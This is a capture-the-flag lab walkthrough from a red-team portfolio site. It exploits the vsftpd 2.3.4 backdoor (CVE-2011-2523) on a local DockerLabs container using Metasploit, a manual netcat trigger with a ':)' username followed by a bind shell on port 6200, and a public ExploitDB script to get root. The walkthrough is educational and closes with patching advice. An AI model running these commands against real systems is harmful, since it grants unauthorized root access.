Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/V0rt3xS0urc3/RedTeam-Portfolio/llms.txt

Use this file to discover all available pages before exploring further.

firsthacking is a Very Easy DockerLabs machine built around one of the most famous backdoors in Linux history: vsftpd 2.3.4. A malicious version of the popular FTP daemon was briefly distributed in 2011 with a hidden backdoor that opens a root shell on port 6200 when a username ending in :) is submitted. This machine teaches you how to find and weaponise a known CVE using both Metasploit and a manual netcat approach — reinforcing the lesson that understanding the underlying mechanism is just as important as running the automated exploit.
Machine Info
FieldDetails
DifficultyVery Easy (Muy Fácil / Súper Fácil)
CategoryHacking Infraestructura
OSLinux
Key TechniquesService enumeration, vsftpd 2.3.4 backdoor (CVE-2011-2523), Metasploit, netcat, searchsploit
Default Target IP172.17.0.2

Phase 0: Launch Kali Portable

Open a second terminal and start your Kali Portable environment:
./run-kali.sh normal
All subsequent commands run inside this session.

Phase 1: Deploy the Machine

Download firsthacking.zip from DockerLabs. In your first terminal:
unzip firsthacking.zip
chmod +x auto_deploy.sh
./auto_deploy.sh firsthacking.tar
You receive two files:
  • auto_deploy.sh — Deploys the vulnerable container
  • firsthacking.tar — The Docker image

Phase 2: Reconnaissance

1

Ping Check

Verify the container is reachable:
ping -c 3 172.17.0.2
2

Nmap Service Scan

Scan all ports at an aggressive rate to identify open services:
nmap -sC -sV --min-rate 5000 172.17.0.2
ArgumentMeaning
-sCDefault NSE scripts
-sVService and version detection
--min-rate 5000Fast scan suitable for local lab environments
Findings:
PortServiceVersion
21/tcpFTPvsftpd 2.3.4
Only port 21 (FTP) is open, running vsftpd 2.3.4 — exactly the backdoored version. This is the entire attack surface.
Use --min-rate only in controlled lab environments. In real engagements, aggressive scanning rates can saturate the network, trigger IDS alerts, and get your source IP blocked automatically.

Phase 3: Exploitation — Two Methods

The vsftpd 2.3.4 backdoor (CVE-2011-2523) works by detecting a smiley face (:)) at the end of the username during FTP authentication. When it detects this string, the daemon opens a bind shell on TCP port 6200 in the background. The attack can be carried out with Metasploit or entirely manually with netcat.

Method A: Metasploit (Automated)

1

Launch Metasploit and Find the Module

Open Metasploit and search for the vsftpd exploit:
msfconsole
search vsftpd 2.3.4
The module exploit/unix/ftp/vsftpd_234_backdoor appears in the results.
2

Load and Configure the Module

Select the exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
# Equivalent shorthand: use 0
Review the options:
show options
Set the target and your local hosts:
set RHOST 172.17.0.2
set LHOST 172.17.0.1
3

Run the Exploit

exploit
If Metasploit successfully triggers the backdoor, you will receive a command shell session. However, due to timing nuances with the backdoor’s bind shell behaviour, Metasploit does not always open the session automatically — if it stalls, proceed to Method B below.
When Metasploit fails to establish the session cleanly, the manual approach is more reliable. This method also gives you a much deeper understanding of how the backdoor actually works.
1

Trigger the Backdoor via FTP

Send a specially crafted FTP authentication sequence using netcat. The :) at the end of the username is the trigger:
(echo "USER root:)"; sleep 1; echo "PASS test") | nc 172.17.0.2 21
PartPurpose
echo "USER root:)"Sends a username ending with :) to trigger the backdoor
sleep 1Pauses to let vsftpd process the smiley and open port 6200
echo "PASS test"Sends any password (the value does not matter)
nc 172.17.0.2 21Connects to the FTP service on port 21
In the background, vsftpd opens a root bind shell on port 6200.
2

Connect to the Bind Shell

In a new terminal window, connect to the now-open port 6200:
nc -v 172.17.0.2 6200
You land in an interactive shell session. Verify your identity:
whoami
# root

Method C: Python Exploit via Searchsploit

A third option uses the public Python exploit from ExploitDB:
searchsploit vsftpd 2.3.4
Copy the Python exploit to your working directory:
cp /usr/share/exploitdb/exploits/unix/remote/49757.py .
Run it against the target:
python3 49757.py 172.17.0.2
The script handles the trigger and connection automatically, dropping you into a root shell.

Phase 4: Verification and Flag

Regardless of which method you used, verify root access and capture the flag:
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

ls /root
cat /root/flag.txt

Post-Lab Cleanup

Return to the deploy terminal and press Ctrl+C to stop the container. Type exit in your Kali Portable session.

Key Takeaways

CVE-2011-2523: A Real Backdoor

The vsftpd 2.3.4 backdoor is not a hypothetical scenario — it was a real supply-chain attack where a malicious version of the software was briefly served from the official download mirror. Always verify checksums of downloaded software.

Three Paths to the Same Root

This machine is an excellent exercise in tool flexibility. Metasploit automates the attack, manual netcat teaches the underlying mechanism, and the Python script shows how standalone PoC exploits work. Learn all three approaches.

Bind Shells vs Reverse Shells

The vsftpd backdoor opens a bind shell — it listens on the target for your incoming connection. A reverse shell is the opposite: the target connects back to you. Bind shells are blocked more often by firewalls; reverse shells are preferred in real engagements.

Keep Software Updated

The fix for CVE-2011-2523 was removing the backdoor in vsftpd 2.3.5. Outdated or unmaintained services in production environments are a leading cause of successful breaches. Always patch and verify software integrity.

Build docs developers (and LLMs) love